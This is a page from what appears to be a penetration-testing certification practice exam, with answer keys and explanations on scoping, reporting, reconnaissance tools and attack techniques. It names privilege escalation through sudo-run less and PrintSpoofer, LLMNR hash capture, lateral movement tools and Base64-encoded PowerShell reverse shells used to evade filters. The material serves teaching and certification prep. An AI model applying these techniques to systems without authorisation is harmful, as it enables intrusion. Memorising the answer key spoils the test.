The Rules of Engagement (RoE) document is specifically designed to define the scope, authorization, and constraints of a penetration test, including target IP ranges, testing windows, and emergency stop conditions. This ensures both the tester and client have a clear, legally binding agreement on how the test will be conducted, preventing misunderstandings or unauthorized actions.

Exam trap

Candidates often confuse the SOW with the RoE. While the SOW covers high-level deliverables and objectives, the RoE specifies the precise operational details, such as the IP ranges to test, testing windows, and emergency stop conditions, as described in this question.

How to eliminate wrong answers

Option A is wrong because a Non-Disclosure Agreement (NDA) is a legal contract that protects confidential information shared between parties, not operational details like IP ranges or testing windows. Option B is wrong because a get-out-of-jail letter is an authorization document that protects the tester from legal liability during testing, but it does not contain scoping details such as IP ranges or testing schedules. Option D is wrong because a Statement of Work (SOW) outlines high-level project deliverables, timelines, and costs, but it typically does not include the granular operational constraints like emergency stop conditions or specific IP ranges, which are reserved for the RoE.

57
MCQmedium

A penetration tester is hired to assess a web application that integrates with a third-party payment API. The client wants the API included in the test but does not have a signed agreement with the vendor. What is the most appropriate action for the tester?

A.Ask the client to obtain a written authorization from the third-party vendor before testing the API.
B.Proceed with testing the API using anonymous techniques to avoid detection.
C.Test only the client's application logic but not the actual API endpoint.
D.Include the API in the test because the client owns the integration.
AnswerA

Testing a third-party API without explicit written authorization from the vendor violates legal boundaries such as the Computer Fraud and Abuse Act (CFAA) and the vendor's terms of service, even if the client holds API credentials. The penetration tester must ensure the scope of work includes a signed authorization from the vendor, specifying the exact systems, time window, and test types permitted, to protect both the tester and the client from liability. Without this, the engagement is technically an unauthorized intrusion, and any findings would be inadmissible or could lead to legal action against the tester.

Why this answer

Testing a third-party API without explicit written authorization from the vendor violates legal and contractual boundaries, potentially constituting unauthorized access under laws like the Computer Fraud and Abuse Act (CFAA). The penetration tester must obtain signed authorization to ensure the test is legally defensible and within scope, as the client cannot grant permission for assets they do not own.

Exam trap

The trap here is that candidates may assume 'anonymous techniques' or 'testing only the application logic' are safe workarounds, failing to recognize that legal authorization is a non-negotiable prerequisite for any testing activity, regardless of technique or scope limitation.

How to eliminate wrong answers

Option B is wrong because using anonymous techniques to avoid detection does not circumvent the lack of legal authorization; it still constitutes unauthorized access and could lead to criminal charges or civil liability. Option C is wrong because testing only the client's application logic without the actual API endpoint would miss critical integration vulnerabilities (e.g., improper handling of API responses, insecure direct object references) and fail to meet the client's requirement to include the API in the test.

58
MCQeasy

During an external penetration test, a tester needs to enumerate DNS records for a target domain to identify mail servers and potential subdomains. The tester has no credentials and wants to use a tool that queries DNS servers directly. Which tool is most appropriate for this task?

A.sqlmap
B.dnsrecon
C.Wireshark
D.John the Ripper
AnswerB

dnsrecon is a dedicated DNS enumeration tool that can query name servers for records such as MX, NS, and A, and can attempt zone transfers and brute-force subdomains. It works without credentials and is designed for the exact task of DNS reconnaissance, making it the most appropriate choice for identifying mail servers and subdomains.

Why this answer

dnsrecon is purpose-built for DNS enumeration, supporting queries for MX, NS, and other record types as well as zone transfer attempts and subdomain brute-forcing. It operates without credentials and directly queries DNS servers. The other tools serve unrelated functions such as packet capture, password cracking, or SQL injection exploitation and cannot perform the required DNS record discovery.

Exam trap

The trap here is confusing general-purpose network or exploitation tools with specialized DNS enumeration utilities that can actively query name servers for records.

59
MCQeasy

A penetration tester has completed the testing phase and is preparing the final report for the client's board of directors. The board members are non-technical and need to understand the overall security posture and business risk. Which section of the report should the tester focus on for this audience?

A.A detailed list of all vulnerabilities with CVSS scores and exploitation steps
B.An executive summary highlighting key risks and business impact
C.A complete log of all commands executed during the test
D.A network diagram showing all discovered hosts and open ports
AnswerB

An executive summary that highlights key risks and business impact is the correct choice because it translates technical findings into the language of business, focusing on potential financial, operational, and reputational consequences. This concise overview helps non-technical decision-makers understand the urgency and allocate resources appropriately, without needing to sift through exploit details. It is the top section of a pentest report, setting the tone and driving strategic action.

Why this answer

The board of directors requires a high-level overview that translates technical findings into business risk. An executive summary achieves this by focusing on key risks, potential financial or reputational impact, and strategic recommendations, avoiding technical jargon like CVSS scores or command logs.

Exam trap

CompTIA often tests the candidate's ability to distinguish between report sections for different audiences, trapping those who think all findings must be presented in full detail regardless of the reader's technical level.

How to eliminate wrong answers

Option A is wrong because a detailed list of vulnerabilities with CVSS scores and exploitation steps is too technical for a non-technical board; it belongs in the technical appendix for IT staff. Option C is wrong because a complete log of all commands executed during the test is operational documentation for the penetration tester's own records or for client technical teams, not for board-level risk communication.

60
MCQhard

A vulnerability scanner reports an unauthenticated critical finding on an internal server. Manual testing shows the vulnerable package is present, but the vulnerable service is disabled and not reachable. How should the tester report this?

A.Report the finding with contextual risk adjustment and explain that the vulnerable service is disabled and not reachable.
B.Delete the finding because the package exists but is not currently exploitable.
C.Report it as critical without context because the scanner assigned critical severity.
D.Exploit the service by enabling it first.
AnswerA

Correct. An unauthenticated critical scanner finding must be preserved in the report, but its severity should be contextually adjusted to reflect actual exploitability. Because the vulnerable service is disabled and not reachable, the CVSS base score overstates the real risk; the report should explicitly document the service's disabled state and network isolation to justify a lower residual risk rating while retaining the evidence.

Why this answer

The vulnerability scanner identified a real package vulnerability, but manual verification revealed the service is disabled and unreachable. The tester must report the finding with a contextual risk adjustment to accurately reflect the reduced exploitability, as per standard risk assessment practices in penetration testing. This ensures the organization understands the actual risk without ignoring the presence of the vulnerable package, which could be enabled in the future.

Exam trap

The trap here is that candidates may assume any scanner-reported critical finding must be reported as-is, ignoring the penetration tester's duty to validate and contextualize findings based on actual service state and reachability.

How to eliminate wrong answers

Option B is wrong because deleting the finding ignores the presence of the vulnerable package, which could be enabled later by an administrator or attacker, leading to a false sense of security. Option C is wrong because reporting it as critical without context disregards the tester's responsibility to validate scanner results and adjust risk based on actual exploitability, as the service is disabled and unreachable. Option D is wrong because enabling the service to exploit it is unethical, violates testing scope, and could cause unintended disruption or security breaches.

61
MCQeasy

While performing a password audit, a tester finds that the hash of 'Password123' is stored in the LAN Manager (LM) hash format. What is the primary security weakness of LM hashes?

A.The password is split into two 7-character halves
B.The hash is case-sensitive
C.The hash is salted with a weak random value
D.The hash uses the MD4 hashing algorithm
AnswerA

The LM hash algorithm truncates the password to 14 characters and splits it into two 7-character halves. Each half is independently DES-encrypted with a constant key, so an attacker can brute-force each 7-character segment separately rather than attacking a 14-character password. This splitting reduces the effective keyspace from 95^14 to approximately 2 * 95^7, which is trivially small for modern offline cracking tools.

Why this answer

The primary security weakness of LAN Manager (LM) hashes is that the password is converted to uppercase, padded or truncated to 14 characters, and then split into two 7-character halves. Each half is hashed independently using DES as the key for a known constant, which means an attacker can brute-force each 7-character half separately, drastically reducing the keyspace from 14 characters to two sets of 7 characters. This makes LM hashes extremely vulnerable to offline cracking, especially with modern tools like John the Ripper or Hashcat.

Exam trap

The trap here is that candidates often confuse LM hashes with NTLM hashes, incorrectly associating the weakness with MD4 (which is used by NTLM) or salting, when the real vulnerability is the split into two 7-character halves that can be attacked independently.

How to eliminate wrong answers

Option B is wrong because LM hashes are actually case-insensitive — the password is uppercased before hashing, so case sensitivity is not a weakness; rather, the lack of case sensitivity reduces entropy. Option C is wrong because LM hashes are not salted at all; they use a static constant (KGS!@#$%) as the DES key input, making precomputed rainbow tables highly effective. Option D is wrong because LM hashes use DES, not MD4; the MD4 algorithm is used in NTLM hashes, which are a separate and more secure replacement for LM.

62
MCQmedium

A penetration tester is using Burp Suite to intercept and modify HTTP traffic. When browsing to an HTTPS site, the tester observes that the requests are encrypted and not being intercepted by Burp. Which configuration step is most likely missing?

A.The proxy listener is not configured to listen on the correct port
B.The Burp CA certificate has not been installed in the browser's trust store
C.The browser's proxy settings are not configured to use Burp
D.The target site is not in Burp's scope
AnswerB

Correct. Burp acts as a man-in-the-middle for HTTPS by generating a certificate for each site signed by its own CA. The browser's trust store must contain the Burp CA certificate, or it will reject the connection.

Why this answer

Burp Suite intercepts HTTPS traffic by acting as a man-in-the-middle, which requires the browser to trust Burp's self-signed CA certificate. Without installing the Burp CA certificate in the browser's trust store, the browser will refuse to establish a TLS connection through the proxy, leaving requests encrypted end-to-end and invisible to Burp.

Exam trap

The trap here is that candidates confuse proxy configuration (setting the browser to use Burp as a proxy) with TLS interception setup, assuming that simply pointing the browser at the proxy is sufficient to intercept HTTPS traffic.

How to eliminate wrong answers

Option A is wrong because the proxy listener port (typically 8080) is irrelevant to TLS interception; even if the port is correct, HTTPS traffic will still be encrypted without the CA certificate. Option C is wrong because the browser's proxy settings must be configured to route traffic through Burp, but the question states the tester is browsing and observing encrypted requests, implying proxy settings are already in place; the missing step is trust of the CA certificate.

63
MCQhard

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

A.PrintSpoofer
B.AlwaysInstallElevated
C.Pass-the-Hash with pth-winexe
D.Kerberoasting
AnswerA

PrintSpoofer is a well-known privilege escalation tool on Windows that exploits the SeImpersonatePrivilege typically held by service accounts. It leverages the Print Spooler's named pipe to trick a high-privileged process (SYSTEM) into connecting to a malicious pipe server, allowing the attacker to impersonate the SYSTEM token. This technique directly abuses token impersonation, making it the correct answer for a compromised user account with such privileges.

Why this answer

SeImpersonatePrivilege allows token impersonation; PrintSpoofer exploits it to get SYSTEM.

64
MCQmedium

A penetration tester is writing the executive summary for a report. The client's CEO needs to understand the business impact of a critical SQL injection vulnerability. Which of the following should the tester include?

A.The exact SQL injection payload used
B.The CVSS vector string
C.The potential for data breach and financial loss
D.The remediation steps in detail
AnswerC

The potential for data breach and financial loss directly addresses the business impact that drives executive decision-making. This option frames the vulnerability in terms of material consequences, such as compliance fines, litigation, and customer turnover, which are the primary concerns for leadership. It aligns the summary's content with the audience's strategic perspective, making the risk tangible and actionable at the board level.

Why this answer

The CEO needs to understand the business impact, not technical details. Option C directly addresses the core concern: a SQL injection vulnerability can lead to unauthorized data access, resulting in a data breach and significant financial loss from fines, remediation costs, and reputational damage. This aligns with the executive summary's goal of translating technical risk into business risk.

Exam trap

The trap here is that candidates confuse the purpose of an executive summary with a technical report, choosing detailed technical data (payload or CVSS) instead of business impact, which is what the CEO actually needs.

How to eliminate wrong answers

Option A is wrong because including the exact SQL injection payload is too technical for an executive summary; it belongs in the technical findings section for the development team. Option B is wrong because the CVSS vector string provides a numerical severity score but does not convey the specific business impact (e.g., potential financial loss or regulatory penalties) that the CEO requires for decision-making.

65
Multi-Selectmedium

A penetration tester is preparing a report that includes technical findings. Which TWO of the following should be included in each technical finding? (Select TWO.)

Select 2 answers
A.Executive summary
B.Client's network diagram
C.Remediation steps with code or commands
D.Business impact analysis
E.Evidence such as screenshots
AnswersC, E

Each finding must include a clear, actionable remediation plan that gives the client specific commands, code patches, or configuration changes to eliminate the vulnerability. For example, a SQL injection finding should include parameterized query code, and an Apache issue should show the revised configuration directives. This is a core requirement of a professional pentest report because it transforms a security flaw from a technical warning into a practical to-do item.

Why this answer

Each technical finding should include remediation steps and evidence such as screenshots.

66
MCQhard

During a penetration test, you want to discover API endpoints and hidden parameters in a web application. Which tool combination is most effective for this task?

A.Wappalyzer and curl
B.WhatWeb and theHarvester
C.Gobuster and Nikto
D.Arjun and ffuf
AnswerD

Arjun discovers hidden API parameters and endpoints through its extensive wordlists and passive/active scanning, while ffuf fuzzes directories, parameters and virtual hosts at high speed. Together they satisfy the stem's need to uncover endpoints and hidden parameters in a web application.

Why this answer

Arjun is a specialized tool for discovering hidden HTTP parameters by fuzzing with a wordlist and analyzing responses, while ffuf is a fast web fuzzer used for directory, file, and parameter discovery. Together, they efficiently uncover API endpoints and hidden parameters that are not linked in the application's visible interface. This combination is specifically designed for the reconnaissance phase of API testing.

Exam trap

PT0-003 often tests tool specialization; candidates may pick Gobuster and Nikto because they are well-known web tools, but they are not optimized for hidden parameter discovery, which is the specific task in the question.

How to eliminate wrong answers

Option A is wrong because Wappalyzer identifies technologies used by a website (e.g., frameworks, CMS) and curl is a manual HTTP client; neither is designed for automated endpoint or parameter discovery. Option B is wrong because WhatWeb is a fingerprinting tool and theHarvester gathers OSINT (emails, subdomains) from public sources, not hidden API endpoints or parameters. Option C is wrong because Gobuster is for brute-forcing directories and DNS subdomains, and Nikto is a web server scanner for known vulnerabilities; neither specializes in hidden parameter discovery.

67
MCQhard

A penetration tester is analyzing a Java application and finds the following code snippet: Object obj = ois.readObject(); where ois is an ObjectInputStream. What vulnerability is most likely present if the input is untrusted?

A.SQL injection
B.Path traversal
C.Insecure deserialization
D.Cross-site scripting
AnswerC

Insecure deserialization is the correct answer because the code likely invokes readObject() on an ObjectInputStream constructed from untrusted input. Attackers can craft a malicious serialized object that, when deserialized, triggers arbitrary code execution through gadget chains in the application's classpath. Java's default deserialization mechanism does not validate the object's class or state, allowing an attacker to exploit this trust boundary. The vulnerability is especially dangerous when the application does not use look-ahead object filtering or allowlist-based class checks before deserializing data.

Why this answer

Insecure deserialization occurs when readObject() is called on untrusted data, potentially leading to code execution.

68
Multi-Selecthard

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

Select 3 answers
A.WMIExec
B.Token impersonation with PrintSpoofer
C.Pass-the-Hash with CrackMapExec
D.AS-REP roasting
E.PsExec
AnswersA, C, E

WMIExec authenticates over DCOM/RPC using valid domain credentials, executing commands remotely via Win32_Process without needing SMB write access or a service install. Against a domain controller, this satisfies the stem's credential-based lateral movement constraint, since the compromised low-privileged user's valid credentials drive the remote execution.

Why this answer

WMIExec (A) is correct because it leverages valid credentials to execute commands remotely over DCOM/WMI (typically via TCP 135 and dynamic RPC ports), enabling lateral movement to a domain controller without needing an interactive logon. Pass-the-Hash with CrackMapExec (C) is correct because it uses captured NTLM hashes with valid credentials to authenticate via SMB (and other protocols), allowing remote command execution and lateral movement across the domain. PsExec (E) is correct because it authenticates with valid credentials over SMB, copies a service binary to ADMIN$, and creates a remote service to execute commands on the target domain controller.

Token impersonation with PrintSpoofer (B) is not a lateral movement technique with valid credentials; it is a local privilege escalation method that abuses the SeImpersonate privilege to gain SYSTEM on the already-compromised host. AS-REP roasting (D) is not lateral movement; it is a credential access technique that requests AS-REP messages for accounts without Kerberos pre-authentication to crack their passwords offline.

69
MCQeasy

A client requests a penetration test of their web application, but they want to exclude all third-party APIs from the scope. Where should this exclusion be documented?

A.Rules of Engagement
B.Executive Summary
C.Findings Report
D.Remediation Plan
AnswerA

The Rules of Engagement (RoE) is the authoritative contract section that legally defines the testing boundaries, including authorized systems, testing windows, and explicit scope exclusions. Because it establishes the formal limits of what the penetration tester may access and perform, any out-of-scope assets or prohibited techniques must be documented here to prevent misunderstandings and legal liability. This makes the RoE the only correct location for recording scope exclusions.

Why this answer

The Rules of Engagement (ROE) document is the authoritative source for defining the scope, boundaries, and constraints of a penetration test, including explicit exclusions such as third-party APIs. This document is established during the planning and scoping phase to ensure both the client and the testing team agree on what is and is not in scope, preventing legal or operational issues. Without documenting the exclusion in the ROE, the tester might inadvertently interact with the third-party APIs, violating the agreement and potentially causing service disruptions or legal liabilities.

Exam trap

CompTIA often tests the misconception that scope exclusions belong in the final report or executive summary because candidates confuse 'what was tested' with 'what was excluded,' but the ROE is the only document that governs the testing parameters before execution begins.

How to eliminate wrong answers

Option B is wrong because the Executive Summary is a high-level overview of the test results, typically found in the final report, and is not used to document scope exclusions or operational constraints; it summarizes findings for non-technical stakeholders. Option C is wrong because the Findings Report details vulnerabilities discovered during the test and their remediation, but it does not define the scope or exclusions—those must be established before testing begins in the ROE.

70
MCQhard

You are leading a penetration test for a financial institution. The scope was defined as the external network and web applications. During the test, you identify a vulnerability in an internal application that was accidentally exposed due to a misconfiguration. The client's project manager requests that you extend the test scope to include the internal network to fully assess the risk. The request comes on the last day of testing. According to reporting and communication best practices, what should you do FIRST?

A.Accept the request and test the internal network immediately
B.Include the internal vulnerability in the final report as an out-of-scope finding
C.Reject the request because it is outside the original scope
D.Document the request and communicate it to both the client and your management for formal scope change approval
AnswerD

Scope changes require formal approval before testing continues, so documenting the request and escalating it to both client and management preserves authorisation boundaries. This satisfies reporting and communication best practise, preventing unauthorised testing of the exposed internal application.

Why this answer

The correct answer is D: document the request and communicate it to both the client and your management for formal scope change approval. Because the original scope covered only the external network and web applications, any expansion to the internal network requires a formal change to the rules of engagement and authorization before testing can occur, especially on the last day of testing. This protects the tester legally and contractually while ensuring the client's project manager is not the sole authority for scope changes.

Option A is wrong because testing immediately without written authorization could be unauthorized access, and option C is wrong because a scope change can be approved rather than simply rejected. Option B is also insufficient because the internal vulnerability should be reported, but the immediate first step is to handle the scope-change request through proper communication and approval channels.

71
MCQmedium

A penetration tester has gained a shell on a Linux machine as a low-privileged user. The user can execute the binary 'less' with sudo privileges without a password. Which technique can the tester use to escalate privileges to root?

A.Exploit a buffer overflow in the 'less' binary.
B.Use the '!' command within 'less' to execute a shell.
C.Run 'sudo -u root bash' to switch to a root shell.
D.Modify the PATH to trick sudo into running a malicious binary.
AnswerB

Because 'less' runs as root via sudo without a password, its interactive '!' command spawns a shell inheriting root privileges. This satisfies the privilege-escalation constraint: GTFOBins-style abuse of a permitted binary, rather than exploiting a kernel or misconfigured file permission.

Why this answer

The 'less' binary, when executed with sudo, retains its ability to spawn a shell via the '!' command. Since the user can run 'less' as root without a password, typing '!/bin/bash' (or simply '!bash') inside 'less' will execute a shell with root privileges, effectively escalating to root.

Exam trap

The trap here is that candidates may overlook the shell escape feature of pagers like 'less' and instead assume they need to exploit a binary vulnerability or use a generic 'sudo -u root bash' command, which fails because the sudoers rule is specific to 'less' only.

How to eliminate wrong answers

Option A is wrong because exploiting a buffer overflow in 'less' is unnecessary and impractical; the intended privilege escalation vector is the built-in '!' command, not a memory corruption vulnerability. Option C is wrong because 'sudo -u root bash' requires the user to have explicit sudo permissions for 'bash', which they do not; the sudoers entry only grants passwordless execution of 'less', not arbitrary commands.

72
MCQmedium

After completing a penetration test, the tester is writing the report. The client's Chief Information Security Officer (CISO) is the primary audience and wants to understand the overall security posture and the most critical risks to the business. Which section of the report should the tester most heavily focus on for this audience?

A.Technical Findings
B.Executive Summary
C.Appendix - Vulnerability Details
D.Methodology
AnswerB

The Executive Summary translates technical findings into business risk, giving the CISO a concise view of overall security posture and critical exposures. This satisfies the audience constraint: the CISO needs strategic risk context, not the granular exploitation detail found in technical findings sections.

Why this answer

The Executive Summary is the section of a penetration test report that provides a high-level overview of the security posture, focusing on business risks and strategic recommendations. For a CISO, who needs to understand the most critical risks to the business without delving into technical details, this section is the most relevant. It translates technical vulnerabilities into business impact, aligning with the CISO's role in risk management and decision-making.

Exam trap

CompTIA often tests the distinction between audience-appropriate report sections, and the trap here is that candidates mistakenly choose Technical Findings or Appendix - Vulnerability Details because they focus on technical depth rather than the business-oriented communication required for a CISO audience.

How to eliminate wrong answers

Option A is wrong because Technical Findings contain detailed exploit steps, affected systems, and raw vulnerability data, which are too granular for a CISO who needs a business-risk perspective rather than technical specifics. Option C is wrong because the Appendix - Vulnerability Details lists raw CVSS scores, CVE IDs, and proof-of-concept code, which are operational details for remediation teams, not for executive-level risk assessment. Option D is wrong because Methodology describes the tools, techniques, and scope of the test (e.g., Nmap scans, Metasploit modules), which is procedural information that does not directly communicate business risk or overall security posture to a CISO.

73
MCQmedium

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

A.Responder
B.CrackMapExec
C.ntlmrelayx
D.Metasploit
AnswerA

Responder is a dedicated network-based attack tool that spoofs name resolution by sending malicious responses to LLMNR, NBT-NS, and mDNS queries. When a host tries to resolve a non-existent name, Responder answers and forces the client to authenticate to it, capturing NTLMv1/v2 challenge-response hashes in the process. These hashes are then offline-crackable or can be forwarded to ntlmrelayx for relay attacks, making Responder the standard tool for this initial hash-capture poisoning phase.

Why this answer

Responder is the primary tool used for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes from network authentication attempts.

74
MCQhard

A penetration tester discovers a remote command injection vulnerability in a Java-based web application on a Windows server. The tester wants to execute a PowerShell reverse shell. Which encoding technique is most effective to avoid filter restrictions on special characters?

A.Base64 encoding
B.URL encoding
C.Unicode encoding
D.Hex encoding
AnswerA

PowerShell natively supports Base64-encoded commands via the `-EncodedCommand` parameter, which takes a UTF-16LE Base64 string, decodes it, and executes the resulting command. This allows an attacker to transmit a fully obfuscated payload that evades filters that scan for suspicious keywords or special characters like semicolons or brackets, because the entire command is encoded. The encoding is transparent to PowerShell, so no additional decode step is needed, making it a reliable bypass in command injection scenarios.

Why this answer

Base64 encoding is the most effective technique because it allows the tester to encode the entire PowerShell command, including special characters like semicolons, pipes, and quotes, into a safe ASCII string that bypasses filter restrictions. PowerShell natively supports the `-EncodedCommand` parameter, which decodes Base64 input directly, making it ideal for remote command injection scenarios where character filtering is strict.

Exam trap

The trap here is that candidates often choose URL encoding because it is familiar from web attacks, but they overlook that PowerShell's `-EncodedCommand` parameter is specifically designed for Base64, making it the most direct and filter-evading method for remote command injection on Windows.

How to eliminate wrong answers

Option B (URL encoding) is wrong because it only encodes individual characters (e.g., %20 for space) and does not prevent filters that block specific special characters like semicolons or pipes; many web application firewalls still inspect decoded content. Option C (Unicode encoding) is wrong because it is not natively supported by PowerShell's command-line parsing for direct execution; PowerShell expects UTF-16LE for `-EncodedCommand`, not general Unicode encoding. Option D (Hex encoding) is wrong because PowerShell does not have a built-in parameter to decode hex-encoded commands directly; the tester would need additional conversion steps, making it less efficient and more likely to be blocked.

75
MCQeasy

A penetration tester is performing passive reconnaissance on a target organization. Which of the following tools would be BEST for discovering subdomains and email addresses associated with the target domain without sending any packets to the target?

A.WPScan
B.Nmap
C.snmpwalk
D.theHarvester
AnswerD

theHarvester is a passive OSINT tool that aggregates publicly accessible information from third-party sources such as search engines, PGP key servers, and certificate transparency logs to collect email addresses, subdomains, hosts, and employee names for a given domain. It never sends packets directly to the target's own infrastructure, so it does not trigger target-side monitoring or violate the passive reconnaissance constraint. Its value lies in building a pre-attack picture of the attack surface from information already available on the internet, making it ideal for the passive phase.

Why this answer

theHarvester is an OSINT tool that collects emails, subdomains, IPs, and URLs from public sources like search engines and PGP key servers without interacting with the target network.

Page 1 of 11

Page 2

All pages